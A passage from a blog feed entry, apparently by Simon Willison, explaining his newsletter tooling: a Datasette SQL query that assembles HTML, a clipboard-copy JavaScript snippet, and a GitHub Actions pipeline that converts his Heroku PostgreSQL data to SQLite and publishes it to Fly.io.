&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;      &lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;&amp;amp;_shape=array&amp;amp;numdays=&lt;span class="pl-s1"&gt;&lt;span class="pl-kos"&gt;${&lt;/span&gt;&lt;span class="pl-s1"&gt;numDays&lt;/span&gt;&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/span&gt;`&lt;/span&gt;
    &lt;span class="pl-kos"&gt;)&lt;/span&gt;
  &lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;json&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
&lt;span class="pl-kos"&gt;}&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This uses the JavaScript &lt;code&gt;fetch()&lt;/code&gt; function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook.&lt;/p&gt;
&lt;p&gt;Here's a link to &lt;a href="https://datasette.simonwillison.net/simonwillisonblog?sql=with+content+as+%28%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27entry%27+as+type%2C%0D%0A++++title%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Ch3%3E%3Ca+href%3D%22%27+%7C%7C+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%0D%0A++++++%7C%7C+%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27+%7C%7C+%27%22%3E%27+%0D%0A++++++%7C%7C+title+%7C%7C+%27%3C%2Fa%3E+-+%27+%7C%7C+date%28created%29+%7C%7C+%27%3C%2Fh3%3E%27+%7C%7C+body%0D%0A++++++as+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++%27%27+as+external_url%0D%0A++from+blog_entry%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27blogmark%27+as+type%2C%0D%0A++++link_title%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Cp%3E%3Cstrong%3ELink%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C+%27+%3Ca+href%3D%22%27%7C%7C+link_url+%7C%7C+%27%22%3E%27%0D%0A++++++%7C%7C+link_title+%7C%7C+%27%3C%2Fa%3E%3A%3C%2Fp%3E%3Cp%3E%27+%7C%7C+%27+%27+%7C%7C+replace%28commentary%2C+%27%0D%0A%27%2C+%27%3Cbr%3E%27%29+%7C%7C+%27%3C%2Fp%3E%27%0D%0A++++++as+html%2C%0D%0A++++json_object%28%0D%0A++++++%27created%27%2C+date%28created%29%2C%0D%0A++++++%27link_url%27%2C+link_url%2C%0D%0A++++++%27link_title%27%2C+link_title%2C%0D%0A++++++%27commentary%27%2C+commentary%2C%0D%0A++++++%27use_markdown%27%2C+use_markdown%0D%0A++++%29+as+json%2C%0D%0A++link_url+as+external_url%0D%0A++from+blog_blogmark%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27quotation%27+as+type%2C%0D%0A++++source%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27%3Cstrong%3Equote%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C%0D%0A++++%27%3Cblockquote%3E%3Cp%3E%3Cem%3E%27+%7C%7C%0D%0A++++replace%28quotatio
n%2C+%27%0D%0A%27%2C+%27%3Cbr%3E%27%29+%7C%7C+%0D%0A++++%27%3C%2Fem%3E%3C%2Fp%3E%3C%2Fblockquote%3E%3Cp%3E%3Ca+href%3D%22%27+%7C%7C%0D%0A++++coalesce%28source_url%2C+%27%23%27%29+%7C%7C+%27%22%3E%27+%7C%7C+source+%7C%7C+%27%3C%2Fa%3E%27+%7C%7C%0D%0A++++case+%0D%0A++++++++when+nullif%28trim%28context%29%2C+%27%27%29+is+not+null+%0D%0A++++++++then+%27%2C+%27+%7C%7C+context+%0D%0A++++++++else+%27%27+%0D%0A++++end+%7C%7C%0D%0A++++%27%3C%2Fp%3E%27+as+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++source_url+as+external_url%0D%0A++from+blog_quotation%0D%0A++union+all%0D%0A++select%0D%0A++++id%2C%0D%0A++++%27note%27+as+type%2C%0D%0A++++case%0D%0A++++++when+title+is+not+null+and+title+%3C%3E+%27%27+then+title%0D%0A++++++else+%27Note+on+%27+%7C%7C+date%28created%29%0D%0A++++end%2C%0D%0A++++created%2C%0D%0A++++slug%2C%0D%0A++++%27No+HTML%27%2C%0D%0A++++json_object%28%0D%0A++++++%27created%27%2C+date%28created%29%2C%0D%0A++++++%27link_url%27%2C+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%0D%0A++++++%7C%7C+%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27%2C%0D%0A++++++%27link_title%27%2C+%27%27%2C%0D%0A++++++%27commentary%27%2C+body%2C%0D%0A++++++%27use_markdown%27%2C+1%0D%0A++++%29%2C%0D%0A++++%27%27+as+external_url%0D%0A++from+blog_note%0D%0A++union+all%0D%0A++select%0D%0A++++rowid%2C%0D%0A++++%27til%27+as+type%2C%0D%0A++++title%2C%0D%0A++++created%2C%0D%0A++++%27null%27+as+slug%2C%0D%0A++++%27%3Cp%3E%3Cstrong%3ETIL%3C%2Fstrong%3E+%27+%7C%7C+date%28created%29+%7C%7C+%27+%3Ca+href%3D%22%27%7C%7C+%27https%3A%2F%2Ftil.simonwillison.net%2F%27+%7C%7C+topic+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%22%3E%27+%7C%7C+title+%7C%7C+%27%3C%2Fa%3E%3A%27+%7C%7C+%27+%27+%7C%7C+substr%28html%2C+1%2C+instr%28html%2C+%27%3C%2Fp%3E%27%29+-+1%29+%7C
%7C+%27+%26%238230%3B%3C%2Fp%3E%27+as+html%2C%0D%0A++++%27null%27+as+json%2C%0D%0A++++%27https%3A%2F%2Ftil.simonwillison.net%2F%27+%7C%7C+topic+%7C%7C+%27%2F%27+%7C%7C+slug+as+external_url%0D%0A++from+til%0D%0A%29%2C%0D%0Acollected+as+%28%0D%0A++select%0D%0A++++id%2C%0D%0A++++type%2C%0D%0A++++title%2C%0D%0A++++case%0D%0A++++++when+type+%3D+%27til%27%0D%0A++++++then+external_url%0D%0A++++++else+%27https%3A%2F%2Fsimonwillison.net%2F%27+%7C%7C+strftime%28%27%25Y%2F%27%2C+created%29%0D%0A++++++%7C%7C+substr%28%27JanFebMarAprMayJunJulAugSepOctNovDec%27%2C+%28strftime%28%27%25m%27%2C+created%29+-+1%29+*+3+%2B+1%2C+3%29+%7C%7C+%0D%0A++++++%27%2F%27+%7C%7C+cast%28strftime%28%27%25d%27%2C+created%29+as+integer%29+%7C%7C+%27%2F%27+%7C%7C+slug+%7C%7C+%27%2F%27%0D%0A++++++end+as+url%2C%0D%0A++++created%2C%0D%0A++++html%2C%0D%0A++++json%2C%0D%0A++++external_url%2C%0D%0A++++case%0D%0A++++++when+type+%3D+%27entry%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_entry_tags+on+blog_tag.id+%3D+blog_entry_tags.tag_id%0D%0A++++++++where+blog_entry_tags.entry_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++when+type+%3D+%27blogmark%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_blogmark_tags+on+blog_tag.id+%3D+blog_blogmark_tags.tag_id%0D%0A++++++++where+blog_blogmark_tags.blogmark_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++when+type+%3D+%27quotation%27+then+%28%0D%0A++++++++select+json_group_array%28tag%29%0D%0A++++++++from+blog_tag%0D%0A++++++++join+blog_quotation_tags+on+blog_tag.id+%3D+blog_quotation_tags.tag_id%0D%0A++++++++where+blog_quotation_tags.quotation_id+%3D+content.id%0D%0A++++++%29%0D%0A++++++else+%27%5B%5D%27%0D%0A++++end+as+tags%0D%0A++from+content%0D%0A++where+created+%3E%3D+date%28%27now%27%2C+%27-%27+%7C%7C+%3Anumdays+%7C%7C+%27+days%27%29+++%0D%0A++order+by+created+desc%0D%0A%29%0D%0Aselect+id%2C+type%2C+title%2C+url%2C+created%2C+html%2C+json%2C+exte
rnal_url%2C+tags%0D%0Afrom+collected+%0D%0Aorder+by+%0D%0A++case+type+%0D%0A++++when+%27entry%27+then+0+%0D%0A++++else+1+%0D%0A++end%2C%0D%0A++case+type+%0D%0A++++when+%27entry%27+then+created+%0D%0A++++else+-strftime%28%27%25s%27%2C+created%29+%0D%0A++end+desc%3B&amp;amp;numdays=7"&gt;see and execute that query&lt;/a&gt; directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;with content &lt;span class="pl-k"&gt;as&lt;/span&gt; (
  &lt;span class="pl-k"&gt;select&lt;/span&gt;
    id,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;entry&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; type,
    title,
    created,
    slug,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;h3&amp;gt;&amp;lt;a href="&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;https://simonwillison.net/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%Y/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created)
      &lt;span class="pl-k"&gt;||&lt;/span&gt; substr(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;JanFebMarAprMayJunJulAugSepOctNovDec&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, (strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%m&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created) &lt;span class="pl-k"&gt;-&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;) &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt; &lt;span class="pl-k"&gt;+&lt;/span&gt; &lt;span class="pl-c1"&gt;1&lt;/span&gt;, &lt;span class="pl-c1"&gt;3&lt;/span&gt;) 
      &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; cast(strftime(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;%d&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;, created) &lt;span class="pl-k"&gt;as&lt;/span&gt; &lt;span class="pl-k"&gt;integer&lt;/span&gt;) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; slug &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;/&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;"&amp;gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; 
      &lt;span class="pl-k"&gt;||&lt;/span&gt; title &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;/a&amp;gt; - &lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-k"&gt;date&lt;/span&gt;(created) &lt;span class="pl-k"&gt;||&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&amp;lt;/h3&amp;gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;||&lt;/span&gt; body
      &lt;span class="pl-k"&gt;as&lt;/span&gt; html,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;null&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; json,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; external_url
  &lt;span class="pl-k"&gt;from&lt;/span&gt; blog_entry
  &lt;span class="pl-k"&gt;union all&lt;/span&gt;
  &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; ...&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;My blog's URLs look like &lt;code&gt;/2025/Nov/18/gemini-3/&lt;/code&gt; - this SQL constructs that three letter month abbreviation from the month number using a substring operation.&lt;/p&gt;
&lt;p&gt;This is a &lt;em&gt;terrible&lt;/em&gt; way to assemble HTML, but I've stuck with it because it amuses me.&lt;/p&gt;
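&lt;p&gt;The month abbreviation trick is easier to see outside of SQL. Here is a minimal Python sketch of the same arithmetic. The &lt;code&gt;month_abbreviation()&lt;/code&gt; and &lt;code&gt;blog_path()&lt;/code&gt; names are made up for illustration and are not part of the newsletter query:&lt;/p&gt;

```python
MONTHS = "JanFebMarAprMayJunJulAugSepOctNovDec"


def month_abbreviation(month_number):
    """Return the three-letter abbreviation for a month number from 1 to 12."""
    # SQLite's substr() is 1-indexed, so the SQL uses (month - 1) * 3 + 1.
    # Python slices are 0-indexed, so the "+ 1" is dropped here.
    start = (month_number - 1) * 3
    return MONTHS[start:start + 3]


def blog_path(year, month_number, day, slug):
    """Build a path shaped like /2025/Nov/18/gemini-3/ (day is not zero-padded)."""
    # Hypothetical helper: mirrors the string concatenation in the SQL snippet
    return f"/{year}/{month_abbreviation(month_number)}/{day}/{slug}/"


print(blog_path(2025, 11, 18, "gemini-3"))
```

&lt;p&gt;SQLite's &lt;code&gt;substr()&lt;/code&gt; counts from 1, which is why the SQL adds 1 to the offset while the Python slice does not.&lt;/p&gt;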
&lt;p&gt;The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button.&lt;/p&gt;
&lt;p&gt;Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective:&lt;/p&gt;
&lt;div class="highlight highlight-source-js"&gt;&lt;pre&gt;&lt;span class="pl-v"&gt;Object&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;assign&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;
  &lt;span class="pl-en"&gt;html&lt;/span&gt;&lt;span class="pl-s"&gt;`&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;button&lt;/span&gt; &lt;span class="pl-c1"&gt;style&lt;/span&gt;="&lt;span class="pl-s"&gt;font-size: 1.4em; padding: 0.3em 1em; font-weight: bold;&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;Copy rich text newsletter to clipboard`&lt;/span&gt;&lt;span class="pl-kos"&gt;,&lt;/span&gt;
  &lt;span class="pl-kos"&gt;{&lt;/span&gt;
    &lt;span class="pl-en"&gt;onclick&lt;/span&gt;: &lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt; &lt;span class="pl-c1"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-kos"&gt;{&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;htmlContent&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;newsletterHTML&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Create a temporary element to hold the HTML content&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;tempElement&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;createElement&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"div"&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;innerHTML&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-s1"&gt;htmlContent&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;body&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;appendChild&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Select the HTML content&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;range&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;createRange&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;range&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;selectNode&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-c"&gt;// Copy the selected HTML content to the clipboard&lt;/span&gt;
      &lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-s1"&gt;selection&lt;/span&gt; &lt;span class="pl-c1"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;window&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;getSelection&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeAllRanges&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;addRange&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;range&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;execCommand&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s"&gt;"copy"&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-s1"&gt;selection&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeAllRanges&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
      &lt;span class="pl-smi"&gt;document&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-c1"&gt;body&lt;/span&gt;&lt;span class="pl-kos"&gt;.&lt;/span&gt;&lt;span class="pl-en"&gt;removeChild&lt;/span&gt;&lt;span class="pl-kos"&gt;(&lt;/span&gt;&lt;span class="pl-s1"&gt;tempElement&lt;/span&gt;&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;span class="pl-kos"&gt;;&lt;/span&gt;
    &lt;span class="pl-kos"&gt;}&lt;/span&gt;
  &lt;span class="pl-kos"&gt;}&lt;/span&gt;
&lt;span class="pl-kos"&gt;)&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4 id="from-django-postgresql-to-datasette-sqlite"&gt;From Django+Postgresql to Datasette+SQLite&lt;/h4&gt;
&lt;p&gt;My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's &lt;a href="https://github.com/simonw/simonwillisonblog"&gt;the source code for that Django application&lt;/a&gt;. I use the Django admin as my CMS.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use.&lt;/p&gt;
&lt;p&gt;My system for doing that lives in the &lt;a href="https://github.com/simonw/simonwillisonblog-backup"&gt;simonw/simonwillisonblog-backup&lt;/a&gt; GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://github.com/simonw/db-to-sqlite"&gt;db-to-sqlite&lt;/a&gt; tool is responsible for that conversion. I call it &lt;a href="https://github.com/simonw/simonwillisonblog-backup/blob/dc5b9df272134ce051a5280b4de6d4daa9b2a9fc/.github/workflows/backup.yml#L44-L62"&gt;like this&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;db-to-sqlite \
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;$(&lt;/span&gt;heroku config:get DATABASE_URL -a simonwillisonblog &lt;span class="pl-k"&gt;|&lt;/span&gt; sed s/postgres:/postgresql+psycopg2:/&lt;span class="pl-pds"&gt;)&lt;/span&gt;&lt;/span&gt; \
  simonwillisonblog.db \
  --table auth_permission \
  --table auth_user \
  --table blog_blogmark \
  --table blog_blogmark_tags \
  --table blog_entry \
  --table blog_entry_tags \
  --table blog_quotation \
  --table blog_quotation_tags \
  --table blog_note \
  --table blog_note_tags \
  --table blog_tag \
  --table blog_previoustagname \
  --table blog_series \
  --table django_content_type \
  --table redirects_redirect&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That &lt;code&gt;heroku config:get DATABASE_URL&lt;/code&gt; command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;db-to-sqlite&lt;/code&gt; can then export that data and write it to a SQLite database file called &lt;code&gt;simonwillisonblog.db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;--table&lt;/code&gt; options specify the tables that should be included in the export.&lt;/p&gt;
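&lt;p&gt;The &lt;code&gt;sed&lt;/code&gt; step in that command only rewrites the scheme at the start of the connection URL. A rough Python equivalent looks like this, using a made-up URL and a hypothetical &lt;code&gt;fix_scheme()&lt;/code&gt; helper that is not part of the actual workflow:&lt;/p&gt;

```python
def fix_scheme(database_url):
    """Swap the postgres: scheme for postgresql+psycopg2: in a connection URL."""
    # Replace only the first occurrence, matching sed's s/// without the g flag
    return database_url.replace("postgres:", "postgresql+psycopg2:", 1)


# Made-up example URL, not a real credential
example_url = "postgres://user:secret@example.com:5432/blog"
print(fix_scheme(example_url))
```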
&lt;p&gt;The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a &lt;a href="https://github.com/simonw/simonwillisonblog-backup/commits/main/simonwillisonblog"&gt;commit history&lt;/a&gt; of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself.&lt;/p&gt;
&lt;p&gt;At the &lt;a href="https://github.com/simonw/simonwillisonblog-backup/blob/dc5b9df272134ce051a5280b4de6d4daa9b2a9fc/.github/workflows/backup.yml#L200-L204"&gt;end of my GitHub Actions workflow&lt;/a&gt; is this code that publishes the resulting database to Datasette running on &lt;a href="https://fly.io/"&gt;Fly.io&lt;/a&gt; using the &lt;a href="https://datasette.io/plugins/datasette-publish-fly"&gt;datasette publish fly&lt;/a&gt; plugin:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;datasette publish fly simonwillisonblog.db \
  -m metadata.yml \
  --app simonwillisonblog-backup \
  --branch 1.0a2 \
  --extra-options &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;--setting sql_time_limit_ms 15000 --setting truncate_cells_html 10000 --setting allow_facet off&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt; \
  --install datasette-block-robots \
  &lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; ... more plugins&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/blogging"&gt;blogging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/django"&gt;django&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/youtube"&gt;youtube&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/heroku"&gt;heroku&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable"&gt;observable&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github-actions"&gt;github-actions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/fly"&gt;fly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/newsletter"&gt;newsletter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/substack"&gt;substack&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/site-upgrades"&gt;site-upgrades&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="blogging"/><category term="django"/><category term="javascript"/><category term="postgresql"/><category term="sql"/><category term="sqlite"/><category term="youtube"/><category term="heroku"/><category term="datasette"/><category term="observable"/><category term="github-actions"/><category term="fly"/><category term="newsletter"/><category term="substack"/><category term="site-upgrades"/></entry><entry><title>A new SQL-powered permissions system in Datasette 1.0a20</title><link href="https://simonwillison.net/2025/Nov/4/datasette-10a20/#atom-tag" rel="alternate"/><published>2025-11-04T21:34:42+00:00</published><updated>2025-11-04T21:34:42+00:00</updated><id>https://simonwillison.net/2025/Nov/4/datasette-10a20/#atom-tag</id><summary type="html">
